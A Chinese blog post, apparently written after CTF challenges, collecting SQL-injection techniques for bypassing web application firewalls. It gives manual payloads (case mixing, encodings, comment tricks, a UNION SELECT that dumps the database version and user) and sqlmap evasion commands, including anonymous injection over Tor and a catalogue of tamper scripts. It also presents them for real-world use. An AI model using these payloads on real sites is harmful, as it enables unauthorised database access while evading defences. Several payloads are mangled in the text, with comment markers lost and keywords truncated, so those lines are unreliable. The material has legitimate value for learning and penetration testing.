这几天的CTF题中有好几道题都是sql注入的,但都存在WAF需要绕过,于是整理了一些常见的绕过WAF注入的方法。
在现实sql注入中我们也常常碰到WAF,那么掌握常见的绕过很有必要。
0x01、手工注入绕过
1、大小写混合
例如:uNIoN sELecT 1,2,3,4
只适用于针对大小写关键字的匹配
2、替换关键字
例如:UNIunionON SELselectECT 1,2,3,4
3、使用编码
URL编码
如:空格变为%20、单引号%27、左括号%28、右括号%29,有时候两次编码绕过%252f%252a*/UNION%252f%252a /SELECT
十六进制编码
可以对单个字符进行十六进制编码绕过,亦可以对整个字符串进行编码绕过。
Unicode编码
单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9
4、使用注释
常见注释符号://, – , /**/, #, –+,– -, ;,–a
普通注释
%55nION/**/%53ElecT 1,2,3,4
内联注释 /!**/只有MySQL能识别
/ !UNION / / !SELECT / 1,2,3
5、等价函数或命令
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
and和or有时候不能使用,可以使用&&和||;还有=不能使用的情况,可以考虑尝试<、>,因为如果不小于又不大于,那边是等于了
对于空格的绕过,可以使用如下符号绕过:%20 %09 %0a %0b %0c %0d %a0 /**/
6、特殊符号
1、使用反引号`
例如select version()
,可以用来过空格和正则,特殊情况下还可以将其做注释符用
2、使用”-+.”
elect+id-1+1.from users; “+”是用于字符串连接的,”-”和”.”在此也用于连接,可以逃过空格和关键字过滤
3、@符号
select@^ 1.from users; @用于变量定义如@var_name,一个@表示用户定义,@@表示系统变量
7、加括号
例如:/?id=(1)union(select(1),mid(hash,1,32)from(users))
8、缓冲区溢出
不少WAF都是由C语言编写的,而C语言缓冲区保护机制。如何WAF在处理测试向量时超出其缓冲区长度,就会引发bug从而实现绕过
例如:id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15–-+
其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好,一般来说对应用软件构成缓冲区溢出都需要较大的测试长度,一般要求1000个以上
参考资料:http://netsecurity.51cto.com/art/201301/376869.htm
0x02、Sqlmap注入绕过
当我们使用sqlmap注入遇到WAF时,可以使用sqlmap中的tamper,它里面有很多实用的防过滤脚本
首先我们需要确定WAF过滤了那些关键字,比如:单引号、空格、select、union、admin等,当我们确定了过滤机制可以使用tamper进行绕过
如何判断使用那个过滤脚本,最简单的办法就是直接在URL手工带入进行测试,根据返回信息进行判断
使用sqlmap确认是否含有WAF
sqlmap -u "http://xxx?id=51&types=4" --thread 10 --identify-waf
使用参数进行绕过
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --ignore-proxy#禁止使用系统的代理,直接连接进行注入
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --flush-session#清空会话,重构注入
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --hex#或者使用参数 --no-cast ,进行字符码转换
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --mobile #对移动端的服务器进行注入
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --tor # 匿名注入
使用脚本绕过
root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B
还可以同时使用多个脚本,使用-v参数观察payload的变化
常见脚本种类:
apostrophemask.py
作用:用UTF8代替引号
equaltolike.py
作用:like代替等号
space2dash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
greatest.py
绕过过滤’>’ ,用GREATEST替换大于号
space2hash.py
作用:空格替换为#号 随机字符串 以及换行符
apostrophenullencode.py
绕过过滤双引号,替换字符和双引号。
halfversionedmorekeywords.py
当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
space2morehash.py
空格替换为 #号 以及更多随机字符串 换行符
appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
base64encode.py
作用:用base64编码替换
space2mssqlhash.py
作用:替换空格
modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
between.py
作用:用between替换大于号(>)
space2mysqldash.py
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
注:之前有个mssql的 这个是mysql的
multiplespaces.py
作用:围绕SQL关键字添加多个空格
space2plus.py
作用:用+替换空格
bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like
nonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
chardoubleencode.py
作用: 双url编码(不处理以编码的)
unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
charencode.py
作用:url编码
randomcase.py
作用:随机大小写
unmagicquotes.py
作用:宽字符绕过 GPC addslashes
randomcomments.py
作用:用/ /分割sql关键字
charunicodeencode.py
作用:字符串 unicode 编码
securesphere.py
作用:追加特制的字符串
versionedmorekeywords.py
作用:注释绕过
space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/ /‘
halfversionedmorekeywords.py
作用:关键字前加注释
参考资料:http://www.cnblogs.com/lcamry/articles/5622584.html
http://www.vuln.cn/2086